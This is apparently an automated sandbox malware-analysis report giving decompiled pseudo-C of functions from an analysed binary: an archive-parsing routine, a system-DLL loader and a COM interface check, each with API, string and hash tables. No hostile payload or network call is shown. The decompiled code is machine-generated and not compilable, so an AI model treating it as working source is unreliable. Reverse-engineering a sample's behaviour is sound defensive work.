				_t354 =  *((intOrPtr*)( *((intOrPtr*)(_t441 + 0x38)) + 8)) +  *((intOrPtr*)( *((intOrPtr*)(_t441 + 0x38))));
				 *((intOrPtr*)(_t436 + 4)) =  *((intOrPtr*)(_t443 - 0x18));
				 *(_t443 - 0x34) = _t354;
				E00410D2E(_t436 + 0x30,  *((intOrPtr*)(_t443 - 0x18)) + 1);
				E00410D5B(_t436 + 0x34,  *((intOrPtr*)(_t443 - 0x18)));
				E00410D2E(_t436 + 0x38,  *((intOrPtr*)(_t443 - 0x18)) + 1);
				E00410D2E(_t436 + 0x2c,  *((intOrPtr*)(_t443 - 0x18)) + 1);
				_t373 = 0;
				 *((intOrPtr*)(_t443 - 0x68)) = 0;
				 *((intOrPtr*)(_t443 - 0x64)) = 0;
				 *((intOrPtr*)(_t443 - 0x60)) = 0;
				 *(_t443 - 0x5c) = 0;
				 *((intOrPtr*)(_t443 - 0x58)) = 0;
				 *((intOrPtr*)(_t443 - 0x54)) = 0;
				_t450 =  *((intOrPtr*)(_t443 - 0x18));
				 *(_t443 - 4) = 2;
				 *((intOrPtr*)(_t443 - 0x30)) = 0;
				 *((intOrPtr*)(_t443 - 0x28)) =  *((intOrPtr*)(_t441 + 0x38));
				 *(_t443 - 0x2c) = 0;
				if( *((intOrPtr*)(_t443 - 0x18)) <= 0) {
					L63:
					_t357 =  *((intOrPtr*)( *((intOrPtr*)(_t441 + 0x38)) + 8)) -  *(_t443 - 0x34) +  *((intOrPtr*)( *((intOrPtr*)(_t441 + 0x38))));
					_t271 =  *(_t443 - 0x2c) << 2;
					 *((intOrPtr*)(_t271 +  *((intOrPtr*)(_t436 + 0x2c)))) =  *((intOrPtr*)(_t443 - 0x1c));
					 *((intOrPtr*)(_t271 +  *((intOrPtr*)(_t436 + 0x30)))) =  *((intOrPtr*)(_t443 - 0x30));
					_t431 =  *((intOrPtr*)( *((intOrPtr*)(_t441 + 0x38)) + 8)) -  *(_t443 - 0x34) +  *((intOrPtr*)( *((intOrPtr*)(_t441 + 0x38))));
					 *(_t271 +  *((intOrPtr*)(_t436 + 0x38))) = _t431;
					_t272 = E00407AB8(_t436 + 0x3c, _t357);
					_t476 = _t357;
					if(_t357 != 0) {
						_t272 = memcpy( *(_t436 + 0x3c),  *(_t443 - 0x34), _t357);
					}
					E00403204(E00403204(_t272,  *(_t443 - 0x5c)),  *((intOrPtr*)(_t443 - 0x68)));
					 *(_t443 - 4) =  *(_t443 - 4) | 0xffffffff;
					E0040E883(_t443 - 0x50);
					_t358 = 0;
					E0040F16C(_t441, _t431, _t443, _t476, 0xc, 0);
					E00410D01(_t436 + 0x28,  *((intOrPtr*)(_t443 - 0x1c)));
					if( *((intOrPtr*)(_t443 - 0x1c)) > 0) {
						do {
							_t282 = E0040EA46( *((intOrPtr*)(_t441 + 0x38)));
							_t391 =  *((intOrPtr*)(_t436 + 0x28));
							 *((intOrPtr*)(_t391 + _t358 * 8)) = _t282;
							_t358 = _t358 + 1;
							 *(_t391 + _t358 * 8 - 4) = _t431;
						} while (_t358 <  *((intOrPtr*)(_t443 - 0x1c)));
					}
					goto L67;
				} else {
					while(1) {
						 *(_t443 - 0x3c) = _t373;
						 *(_t443 - 0x14) = _t373;
						_t431 =  *((intOrPtr*)( *((intOrPtr*)(_t441 + 0x38)) + 8)) - _t354 +  *((intOrPtr*)( *((intOrPtr*)(_t441 + 0x38))));
						 *( *((intOrPtr*)(_t436 + 0x38)) +  *(_t443 - 0x2c) * 4) = _t431;
						_t285 = E0040EB3D( *((intOrPtr*)(_t443 - 0x28)), _t431, _t450);
						 *(_t443 - 0x10) = _t285;
						if(_t285 == 0 || _t285 > 0x40) {
							break;
						}
						 *(_t443 - 0x38) =  *(_t443 - 0x38) & 0x00000000;
						if(_t285 <= 0) {
							_t361 =  *((intOrPtr*)(_t443 - 0x28));
							L37:
							_t393 = 1;
							if(_t285 != _t393 ||  *(_t443 - 0x14) != _t393) {
								_t431 =  *(_t443 - 0x14);
								__eflags = _t431 - _t285 - 1;
								if(_t431 < _t285 - 1) {
									L76:
									_push(0x41de18);
									_push(_t443 + 0xf);
									L00418E02();
									L77:
									_push(0x41de18);
									_push(_t443 + 0xf);
									L00418E02();
									L78:
									_push(0x41de18);
									_push(_t443 + 0xf);
									L00418E02();
									L79:
									_push(0x41de18);
									_push(_t443 + 0xf);
									L00418E02();
									L80:
									_push(0x41de18);
									_push(_t443 + 0xf);
									L00418E02();
									break;
								}
								E00407ECE(_t443 - 0x68, _t431);
								_t431 =  *(_t443 - 0x10);
								E00407ECE(_t443 - 0x5c, _t431);
								 *(_t443 + 8) =  *(_t443 + 8) & 0x00000000;
								__eflags =  *(_t443 - 0x10) - 1;
								if(__eflags <= 0) {
									L48:
									_t304 =  *(_t443 - 0x14) -  *(_t443 - 0x10) - 1;
									__eflags = _t304 - 1;
									 *(_t443 - 0x24) = _t304;
									if(_t304 == 1) {
										L53:
										_t305 = 0;
										__eflags = 0 -  *(_t443 - 0x10);
										if(__eflags >= 0) {
											L59:
											if(__eflags == 0) {
												goto L80;
											}
											goto L60;
										} else {
											goto L54;
										}
										while(1) {
											L54:
											_t401 =  *(_t443 - 0x5c);
											__eflags =  *((char*)(_t305 + _t401));
											if( *((char*)(_t305 + _t401)) == 0) {
												break;
											}
											_t305 = _t305 + 1;
											__eflags = _t305 -  *(_t443 - 0x10);
											if(_t305 <  *(_t443 - 0x10)) {
												continue;
											}
											L58:
											__eflags = _t305 -  *(_t443 - 0x10);
											goto L59;
										}
										 *(_t443 - 0x3c) = _t305;
										goto L58;
									}
									 *(_t443 + 8) =  *(_t443 + 8) & 0x00000000;
									__eflags = _t304;
									if(__eflags <= 0) {
										goto L53;
									} else {
										goto L50;
									}
									while(1) {
										L50:
										_t314 = E0040EB3D(_t361, _t431, __eflags);
										__eflags = _t314 -  *(_t443 - 0x14);
										if(_t314 >=  *(_t443 - 0x14)) {
											goto L79;
										}
										_t315 = _t314 +  *((intOrPtr*)(_t443 - 0x68));
										__eflags =  *_t315;
										if( *_t315 != 0) {
											goto L79;
										}
										 *(_t443 + 8) =  *(_t443 + 8) + 1;
										 *_t315 = 1;
										__eflags =  *(_t443 + 8) -  *(_t443 - 0x24);
										if(__eflags < 0) {
											continue;
										}
										goto L53;
									}
									goto L79;
								} else {
									goto L43;
								}
								while(1) {
									L43:
									_t317 = E0040EB3D( *((intOrPtr*)(_t441 + 0x38)), _t431, __eflags);
									__eflags = _t317 -  *(_t443 - 0x14);
									if(_t317 >=  *(_t443 - 0x14)) {
										goto L78;
									}
									_t318 = _t317 +  *((intOrPtr*)(_t443 - 0x68));
									__eflags =  *_t318;
									if(__eflags != 0) {
										goto L78;
									}
									 *_t318 = 1;
									_t319 = E0040EB3D( *((intOrPtr*)(_t441 + 0x38)), _t431, __eflags);
									_t407 =  *(_t443 - 0x10);
									__eflags = _t319 - _t407;
									if(_t319 >= _t407) {
										goto L77;
									}
									_t431 =  *(_t443 - 0x5c);
									_t320 = _t319 + _t431;
									__eflags =  *_t320;
									if( *_t320 != 0) {
										goto L77;
									}
									 *(_t443 + 8) =  *(_t443 + 8) + 1;
									 *_t320 = 1;
									__eflags =  *(_t443 + 8) - _t407 - 1;
									if(__eflags < 0) {
										continue;
									}
									goto L48;
								}
								goto L78;
							} else {
								 *(_t443 - 0x3c) =  *(_t443 - 0x3c) & 0x00000000;
								 *(_t443 - 0x24) = _t393;
								L60:
								_t362 =  *(_t443 - 0x2c);
								_t306 =  *((intOrPtr*)(_t443 - 0x1c));
								 *((intOrPtr*)( *((intOrPtr*)(_t436 + 0x2c)) + _t362 * 4)) = _t306;
								_t399 =  *((intOrPtr*)(_t443 - 0x30));
								 *((intOrPtr*)(_t443 - 0x1c)) = _t306 +  *(_t443 - 0x10);
								 *((intOrPtr*)( *((intOrPtr*)(_t436 + 0x30)) + _t362 * 4)) = _t399;
								if( *(_t443 - 0x24) >  *_t436 - _t399) {
									E0040E966(_t399);
								}
								 *((intOrPtr*)(_t443 - 0x30)) =  *((intOrPtr*)(_t443 - 0x30)) +  *(_t443 - 0x24);
								 *((char*)( *((intOrPtr*)(_t436 + 0x34)) + _t362)) =  *(_t443 - 0x3c);
								_t363 = _t362 + 1;
								 *(_t443 - 0x2c) = _t363;
								if(_t363 <  *((intOrPtr*)(_t443 - 0x18))) {
									_t354 =  *(_t443 - 0x34);
									_t373 = 0;
									__eflags = 0;
									continue;
								} else {
									goto L63;
								}
							}
						} else {
							goto L6;
						}
						while(1) {
							L6:
							_t361 =  *((intOrPtr*)(_t443 - 0x28));
							_t408 = _t361;
							_t322 = E0040E9B4(_t361);
							 *(_t443 + 0xb) = _t322;
							if((_t322 & 0x000000c0) != 0) {
								break;
							}
							_t333 = _t322 & 0x0000000f;
							 *(_t443 - 0x20) = _t333;
							if(_t333 > 8) {
								L72:
								_push(0x41de18);
								_push(_t443 + 0xf);
								L00418E02();
								goto L73;
							} else {
								if( *(_t443 - 0x20) >  *((intOrPtr*)(_t361 + 4)) -  *((intOrPtr*)(_t361 + 8))) {
									E0040E966(_t408);
								}
								_t337 =  *_t361 +  *((intOrPtr*)(_t361 + 8));
								 *((intOrPtr*)(_t443 - 0x40)) = _t337;
								 *(_t443 - 0x48) = 0;
								 *(_t443 - 0x44) = 0;
								 *(_t443 - 0x24) = 0;
								if( *(_t443 - 0x20) <= 0) {
									L15:
									 *((intOrPtr*)(_t361 + 8)) =  *((intOrPtr*)(_t361 + 8)) +  *(_t443 - 0x20);
									if( *((intOrPtr*)(_t436 + 0x50)) < 0x80) {
										E00410B9E(_t436 + 0x4c,  *(_t443 - 0x48),  *(_t443 - 0x44));
									}
									_t460 =  *(_t443 + 0xb) & 0x00000010;
									 *(_t443 - 0x24) = 1;
									if(( *(_t443 + 0xb) & 0x00000010) == 0) {
										L20:
										 *(_t443 - 0x14) =  *(_t443 - 0x14) +  *(_t443 - 0x24);
										if( *(_t443 - 0x14) > 0x40) {
											goto L75;
										}
										_t464 =  *(_t443 + 0xb) & 0x00000020;
										if(( *(_t443 + 0xb) & 0x00000020) != 0) {
											_t342 = E0040EB3D(_t361, _t431, _t464);
											 *(_t443 + 8) = _t342;
											_t414 =  *((intOrPtr*)(_t361 + 4)) -  *((intOrPtr*)(_t361 + 8));
											if(_t342 >  *((intOrPtr*)(_t361 + 4)) -  *((intOrPtr*)(_t361 + 8))) {
												E0040E966(_t414);
												_t342 =  *(_t443 + 8);
											}
											if( *(_t443 - 0x48) != 0x21 ||  *(_t443 - 0x44) != 0) {
												__eflags =  *(_t443 - 0x48) - 0x30101;
												if( *(_t443 - 0x48) == 0x30101) {
													__eflags =  *(_t443 - 0x44);
													if( *(_t443 - 0x44) == 0) {
														__eflags = _t342 - 5;
														if(_t342 == 5) {
															_t415 =  *((intOrPtr*)(_t441 + 0x38));
															_t431 =  *(_t415 + 8);
															_t417 =  *((intOrPtr*)(_t431 +  *_t415 + 1));
															__eflags =  *((intOrPtr*)(_t436 + 0x48)) - _t417;
															if( *((intOrPtr*)(_t436 + 0x48)) < _t417) {
																 *((intOrPtr*)(_t436 + 0x48)) = _t417;
															}
														}
													}
												}
											} else {
												if(_t342 == 1) {
													_t418 =  *((intOrPtr*)(_t441 + 0x38));
													_t431 =  *(_t418 + 8);
													_t420 =  *((intOrPtr*)(_t431 +  *_t418));
													if( *((intOrPtr*)(_t436 + 0x44)) < _t420) {
														 *((char*)(_t436 + 0x44)) = _t420;
													}
												}
											}
											 *((intOrPtr*)(_t361 + 8)) =  *((intOrPtr*)(_t361 + 8)) + _t342;
										}
										 *(_t443 - 0x38) =  *(_t443 - 0x38) + 1;
										if( *(_t443 - 0x38) <  *(_t443 - 0x10)) {
											continue;
										} else {
											_t285 =  *(_t443 - 0x10);
											goto L37;
										}
									} else {
										_t344 = E0040EB3D(_t361, _t431, _t460);
										_t461 = _t344 - 0x40;
										 *(_t443 - 0x24) = _t344;
										if(_t344 > 0x40) {
											L73:
											_push(0x41de18);
											_push(_t443 + 0xf);
											L00418E02();
											L74:
											_push(0x41de18);
											_push(_t443 + 0xf);
											L00418E02();
											L75:
											_push(0x41de18);
											_push(_t443 + 0xf);
											L00418E02();
											goto L76;
										}
										if(E0040EB3D(_t361, _t431, _t461) != 1) {
											goto L74;
										}
										goto L20;
									}
								} else {
									while(1) {
										asm("cdq");
										_t364 = _t431;
										_t431 =  *(_t443 - 0x44);
										_t425 = 8;
										_t349 = E004190E0( *(_t443 - 0x48), _t425, _t431);
										 *(_t443 - 0x24) =  *(_t443 - 0x24) + 1;
										 *(_t443 - 0x48) =  *( *(_t443 - 0x24) + _t337) & 0x000000ff | _t349;
										 *(_t443 - 0x44) = _t364 | _t431;
										if( *(_t443 - 0x24) >=  *(_t443 - 0x20)) {
											break;
										}
										_t337 =  *((intOrPtr*)(_t443 - 0x40));
									}
									_t436 =  *((intOrPtr*)(_t443 + 0xc));
									_t361 =  *((intOrPtr*)(_t443 - 0x28));
									goto L15;
								}
							}
						}
						_push(0x41de18);
						_push(_t443 + 0xf);
						L00418E02();
						goto L72;
					}
					_push(0x41de18);
					_push(_t443 + 0xf);
					L00418E02();
					L82:
					E0040EA33( *((intOrPtr*)(_t441 + 0x38)), _t431);
					while(1) {
						L67:
						_t278 = E0040EA46( *((intOrPtr*)(_t441 + 0x38)));
						if((_t278 | _t431) == 0) {
							break;
						}
						if(_t278 != 0xa || _t431 != 0) {
							goto L82;
						} else {
							E0040F1EC(_t441, _t431,  *((intOrPtr*)(_t443 - 0x18)), _t436 + 0xc);
							continue;
						}
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t443 - 0xc));
					return _t278;
				}
			}

0x0040f313
0x0040f321
0x0040f325
0x0040f32d
0x0040f332
0x0040f336
0x0040f33a
0x0040f33d
0x0040f346
0x0040f34a
0x0040f352
0x0040f35b
0x0040f360
0x0040f365
0x0040f368
0x0040f373
0x0040f380
0x0040f38d
0x0040f392
0x0040f394
0x0040f397
0x0040f39a
0x0040f39d
0x0040f3a0
0x0040f3a3
0x0040f3a9
0x0040f3ac
0x0040f3b0
0x0040f3b3
0x0040f3b6
0x0040f3b9
0x0040f6bd
0x0040f6cc
0x0040f6d1
0x0040f6d5
0x0040f6de
0x0040f6ea
0x0040f6ef
0x0040f6f5
0x0040f6fa
0x0040f6fc
0x0040f705
0x0040f70a
0x0040f718
0x0040f71d
0x0040f726
0x0040f72b
0x0040f732
0x0040f73d
0x0040f745
0x0040f747
0x0040f74a
0x0040f74f
0x0040f752
0x0040f755
0x0040f759
0x0040f759
0x0040f747
0x00000000
0x0040f3bf
0x0040f3c6
0x0040f3c9
0x0040f3cc
0x0040f3da
0x0040f3df
0x0040f3e2
0x0040f3e9
0x0040f3ec
0x00000000
0x00000000
0x0040f3fb
0x0040f401
0x0040f58e
0x0040f576
0x0040f578
0x0040f57b
0x0040f593
0x0040f597
0x0040f599
0x0040f7f6
0x0040f7f9
0x0040f804
0x0040f805
0x0040f80a
0x0040f80d
0x0040f818
0x0040f819
0x0040f81e
0x0040f821
0x0040f82c
0x0040f82d
0x0040f832
0x0040f835
0x0040f840
0x0040f841
0x0040f846
0x0040f849
0x0040f854
0x0040f855
0x00000000
0x0040f855
0x0040f5a2
0x0040f5a7
0x0040f5ad
0x0040f5b5
0x0040f5ba
0x0040f5bc
0x0040f60f
0x0040f616
0x0040f618
0x0040f61b
0x0040f61e
0x0040f654
0x0040f654
0x0040f656
0x0040f659
0x0040f672
0x0040f672
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f65b
0x0040f65b
0x0040f65b
0x0040f65e
0x0040f662
0x00000000
0x00000000
0x0040f664
0x0040f665
0x0040f668
0x00000000
0x00000000
0x0040f66f
0x0040f66f
0x00000000
0x0040f66f
0x0040f66c
0x00000000
0x0040f66c
0x0040f620
0x0040f624
0x0040f626
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f628
0x0040f628
0x0040f62a
0x0040f62f
0x0040f632
0x00000000
0x00000000
0x0040f63b
0x0040f63d
0x0040f640
0x00000000
0x00000000
0x0040f646
0x0040f649
0x0040f64f
0x0040f652
0x00000000
0x00000000
0x00000000
0x0040f652
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f5be
0x0040f5be
0x0040f5c1
0x0040f5c6
0x0040f5c9
0x00000000
0x00000000
0x0040f5d2
0x0040f5d4
0x0040f5d7
0x00000000
0x00000000
0x0040f5dd
0x0040f5e3
0x0040f5e8
0x0040f5eb
0x0040f5ed
0x00000000
0x00000000
0x0040f5f3
0x0040f5f6
0x0040f5f8
0x0040f5fb
0x00000000
0x00000000
0x0040f601
0x0040f604
0x0040f60a
0x0040f60d
0x00000000
0x00000000
0x00000000
0x0040f60d
0x00000000
0x0040f582
0x0040f582
0x0040f586
0x0040f678
0x0040f67b
0x0040f67e
0x0040f681
0x0040f687
0x0040f68a
0x0040f690
0x0040f69a
0x0040f69c
0x0040f69c
0x0040f6a7
0x0040f6ad
0x0040f6b0
0x0040f6b4
0x0040f6b7
0x0040f3c1
0x0040f3c4
0x0040f3c4
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f6b7
0x00000000
0x00000000
0x00000000
0x0040f407
0x0040f407
0x0040f407
0x0040f40a
0x0040f40c
0x0040f413
0x0040f416
0x00000000
0x00000000
0x0040f41c
0x0040f422
0x0040f425
0x0040f7a6
0x0040f7a9
0x0040f7b4
0x0040f7b5
0x00000000
0x0040f42b
0x0040f434
0x0040f436
0x0040f436
0x0040f440
0x0040f447
0x0040f44a
0x0040f44d
0x0040f450
0x0040f453
0x0040f48f
0x0040f497
0x0040f4a1
0x0040f4ac
0x0040f4ac
0x0040f4b1
0x0040f4b5
0x0040f4bc
0x0040f4e1
0x0040f4e4
0x0040f4eb
0x00000000
0x00000000
0x0040f4f1
0x0040f4f5
0x0040f4f9
0x0040f501
0x0040f504
0x0040f509
0x0040f50b
0x0040f510
0x0040f510
0x0040f517
0x0040f539
0x0040f540
0x0040f542
0x0040f546
0x0040f548
0x0040f54b
0x0040f54d
0x0040f550
0x0040f555
0x0040f559
0x0040f55c
0x0040f55e
0x0040f55e
0x0040f55c
0x0040f54b
0x0040f546
0x0040f51f
0x0040f522
0x0040f524
0x0040f527
0x0040f52c
0x0040f532
0x0040f534
0x0040f534
0x0040f532
0x0040f522
0x0040f561
0x0040f561
0x0040f564
0x0040f56d
0x00000000
0x0040f573
0x0040f573
0x00000000
0x0040f573
0x0040f4be
0x0040f4c0
0x0040f4c5
0x0040f4c8
0x0040f4cb
0x0040f7ba
0x0040f7bd
0x0040f7c8
0x0040f7c9
0x0040f7ce
0x0040f7d1
0x0040f7dc
0x0040f7dd
0x0040f7e2
0x0040f7e5
0x0040f7f0
0x0040f7f1
0x00000000
0x0040f7f1
0x0040f4db
0x00000000
0x00000000
0x00000000
0x0040f4db
0x0040f455
0x0040f45a
0x0040f463
0x0040f469
0x0040f46b
0x0040f46e
0x0040f46f
0x0040f478
0x0040f47b
0x0040f481
0x0040f487
0x00000000
0x00000000
0x0040f457
0x0040f457
0x0040f489
0x0040f48c
0x00000000
0x0040f48c
0x0040f453
0x0040f425
0x0040f795
0x0040f7a0
0x0040f7a1
0x00000000
0x0040f7a1
0x0040f85d
0x0040f868
0x0040f869
0x0040f86e
0x0040f871
0x0040f75f
0x0040f75f
0x0040f762
0x0040f76b
0x00000000
0x00000000
0x0040f774
0x00000000
0x0040f782
0x0040f78b
0x00000000
0x0040f78b
0x0040f774
0x0040f881
0x0040f889
0x0040f889

APIs

__EH_prolog.LIBCMT ref: 0040F313

Part of subcall function 0040EB3D: _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040EB60

memcpy.MSVCRT ref: 0040F705
_CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F7A1
_CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F7B5
_CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F7C9
_CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F7DD
_CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F7F1
_CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F805
_CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F819
_CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F82D
_CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F841
_CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F855
_CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F869

Part of subcall function 0040E966: _CxxThrowException.MSVCRT(?,0041DDD8), ref: 0040E979

Strings

@, xrefs: 0040F4E7
!, xrefs: 0040F513
, xrefs: 0040F4F1

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: ExceptionThrow$H_prologmemcpy
String ID: $!$@
API String ID: 3273695820-2517134481
Opcode ID: 009ab704528832d8b16fb1e058230fc7f2265cacff4db05c787c47a6afb7277e
Instruction ID: a27f184481075ffe3955191de69d9ea92fdf604195ce2ec282d718430c25bf8c
Opcode Fuzzy Hash: 009ab704528832d8b16fb1e058230fc7f2265cacff4db05c787c47a6afb7277e
Instruction Fuzzy Hash: A5127074A01249EFCF24DFA5C5819EDBBB1BF09304F10847EE845AB792C738A995CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004143E0, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 81
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E004143E0() {
				_Unknown_base(*)()* _t24;
				signed int _t25;
				intOrPtr _t26;
				struct HINSTANCE__* _t29;
				intOrPtr _t30;
				short* _t39;
				intOrPtr* _t46;
				signed int _t47;
				void* _t48;

				 *((intOrPtr*)(_t48 + 0xc)) = 0x114;
				if(GetVersionExW(_t48 + 4) == 0 ||  *((intOrPtr*)(_t48 + 0xc)) != 6 ||  *((intOrPtr*)(_t48 + 0x10)) != 0) {
					_t24 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "SetDefaultDllDirectories");
					if(_t24 == 0) {
						goto L5;
					} else {
						_t25 =  *_t24(0xc00);
						if(_t25 == 0) {
							goto L5;
						}
					}
				} else {
					L5:
					_t25 = GetSystemDirectoryW(_t48 + 0x11c, 0x106);
					if(_t25 != 0 && _t25 <= 0x104) {
						_t25 = lstrlenW(_t48 + 0x11c);
						_t47 = _t25;
						if( *((short*)(_t48 + 0x11a + _t47 * 2)) != 0x5c) {
							 *((short*)(_t48 + 0x11c + _t47 * 2)) = 0x5c;
							_t47 = _t47 + 1;
						}
						_t46 =  *0x41c1cc; // 0x41c1d0
						if( *_t46 != 0) {
							do {
								_t26 =  *_t46;
								_t46 = _t46 + 1;
								 *((short*)(_t48 + 0x124 + _t47 * 2)) = 0;
								if(_t26 == 0) {
									goto L14;
								}
								_t39 = _t48 + 0x126 + _t47 * 2;
								do {
									_t30 =  *_t46;
									_t46 = _t46 + 1;
									 *_t39 = 0;
									_t39 = _t39 + 2;
								} while (_t30 != 0);
								L14:
								lstrcatW(_t48 + 0x124, L".dll");
								_t29 = LoadLibraryExW(_t48 + 0x124, 0, 8);
							} while ( *_t46 != 0);
							return _t29;
						}
					}
				}
				return _t25;
			}

0x004143ed
0x004143fd
0x0041441f
0x00414427
0x00000000
0x00414429
0x0041442e
0x00414432
0x00000000
0x00000000
0x00414432
0x00414438
0x00414438
0x00414445
0x0041444d
0x00414466
0x0041446c
0x00414477
0x00414479
0x00414483
0x00414483
0x00414484
0x0041448d
0x0041449d
0x0041449d
0x004144a2
0x004144a7
0x004144af
0x00000000
0x00000000
0x004144b1
0x004144b8
0x004144b8
0x004144bf
0x004144c0
0x004144c3
0x004144c6
0x004144ca
0x004144d7
0x004144e5
0x004144e7
0x00000000
0x004144ed
0x0041448d
0x0041444d
0x004144f6

APIs

GetVersionExW.KERNEL32 ref: 004143F5
GetModuleHandleW.KERNEL32(kernel32.dll,SetDefaultDllDirectories), ref: 00414418
GetProcAddress.KERNEL32(00000000), ref: 0041441F
GetSystemDirectoryW.KERNEL32(?,00000106), ref: 00414445
lstrlenW.KERNEL32(?), ref: 00414466
lstrcatW.KERNEL32(?,.dll), ref: 004144D7
LoadLibraryExW.KERNEL32(?,00000000,00000008,?,00000000), ref: 004144E5

Strings

\, xrefs: 0041446E
\, xrefs: 00414479
kernel32.dll, xrefs: 00414413
SetDefaultDllDirectories, xrefs: 0041440E
.dll, xrefs: 004144D1

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemVersionlstrcatlstrlen
String ID: .dll$SetDefaultDllDirectories$\$\$kernel32.dll
API String ID: 532070074-471922092
Opcode ID: ae18c3a299c0fc34f521af23ecae2155342ef2f81c69c2ab57d08f5bd9fad663
Instruction ID: d987fb0205f110b4e88cb17dd8f0118f17295e0edb0f928e64eab48f7225754e
Opcode Fuzzy Hash: ae18c3a299c0fc34f521af23ecae2155342ef2f81c69c2ab57d08f5bd9fad663
Instruction Fuzzy Hash: 46219E312443049BD7349B609C44BD777E8AB98710F10882EE68593290E77CD585CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406C96, Relevance: 13.9, APIs: 11, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00406C96(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t27;
				signed int _t30;
				intOrPtr* _t33;
				void* _t34;
				void* _t35;
				void* _t37;
				signed int _t38;
				signed int* _t40;
				intOrPtr _t41;
				signed int _t42;

				_t41 = _a8;
				_t40 = _a12;
				_t35 = 0x10;
				 *_t40 =  *_t40 & 0x00000000;
				_push(_t35);
				_push(0x41c24c);
				_push(_t41);
				L00418DA0();
				if(_t27 == 0) {
					L1:
					_t42 = _a4;
					 *_t40 = _t42;
					L24:
					 *((intOrPtr*)(_t42 + 0x28)) =  *((intOrPtr*)(_t42 + 0x28)) + 1;
					return 0;
				}
				_push(_t35);
				_push(0x41b320);
				_push(_t41);
				L00418DA0();
				if(_t27 == 0) {
					goto L1;
				}
				_push(_t35);
				_push(0x41b280);
				_push(_t41);
				L00418DA0();
				if(_t27 == 0) {
					_t42 = _a4;
					_t30 = _t42;
					_t38 = _t42 + 4;
					L23:
					asm("sbb eax, eax");
					 *_t40 =  ~_t30 & _t38;
					goto L24;
				}
				_push(_t35);
				_push(0x41b260);
				_push(_t41);
				L00418DA0();
				if(_t27 == 0) {
					_t42 = _a4;
					_t30 = _t42;
					_t38 = _t42 + 8;
					goto L23;
				}
				_push(_t35);
				_push(0x41b2a0);
				_push(_t41);
				L00418DA0();
				if(_t27 == 0) {
					_t42 = _a4;
					_t30 = _t42;
					_t38 = _t42 + 0xc;
					goto L23;
				}
				_push(_t35);
				_push(0x41b3b0);
				_push(_t41);
				L00418DA0();
				if(_t27 == 0) {
					_t42 = _a4;
					_t30 = _t42;
					_t38 = _t42 + 0x10;
					goto L23;
				}
				_push(_t35);
				_push(0x41b290);
				_push(_t41);
				L00418DA0();
				if(_t27 == 0) {
					_t42 = _a4;
					_t30 = _t42;
					_t38 = _t42 + 0x14;
					goto L23;
				}
				_push(_t35);
				_push(0x41b3a0);
				_push(_t41);
				L00418DA0();
				if(_t27 == 0) {
					_t42 = _a4;
					_t30 = _t42;
					_t38 = _t42 + 0x18;
					goto L23;
				}
				_push(_t35);
				_push(0x41b360);
				_push(_t41);
				L00418DA0();
				if(_t27 == 0) {
					_t42 = _a4;
					_t30 = _t42;
					_t38 = _t42 + 0x1c;
					goto L23;
				}
				_push(_t35);
				_push(0x41b270);
				_push(_t41);
				L00418DA0();
				if(_t27 == 0) {
					_t42 = _a4;
					_t30 = _t42;
					_t38 = _t42 + 0x20;
					goto L23;
				}
				_push(_t35);
				_push(0x41b300);
				_push(_t41);
				L00418DA0();
				if(_t27 != 0) {
					return 0x80004002;
				}
				_t42 = _a4;
				_t37 = _t42 + 0x64;
				if( *((intOrPtr*)(_t42 + 0x64)) != _t27) {
					L22:
					_t30 = _t42;
					_t38 = _t42 + 0x24;
					goto L23;
				}
				_t33 =  *((intOrPtr*)(_t42 + 0x68));
				_t34 =  *((intOrPtr*)( *_t33))(_t33, 0x41b300, _t37);
				if(_t34 == 0) {
					goto L22;
				}
				return _t34;
			}

0x00406c9b
0x00406c9f
0x00406ca4
0x00406ca5
0x00406ca8
0x00406ca9
0x00406cae
0x00406caf
0x00406cb9
0x00406cbb
0x00406cbb
0x00406cbe
0x00406e09
0x00406e09
0x00000000
0x00406e0c
0x00406cc5
0x00406cc6
0x00406ccb
0x00406ccc
0x00406cd6
0x00000000
0x00000000
0x00406cd8
0x00406cd9
0x00406cde
0x00406cdf
0x00406ce9
0x00406ceb
0x00406cee
0x00406cf0
0x00406e01
0x00406e03
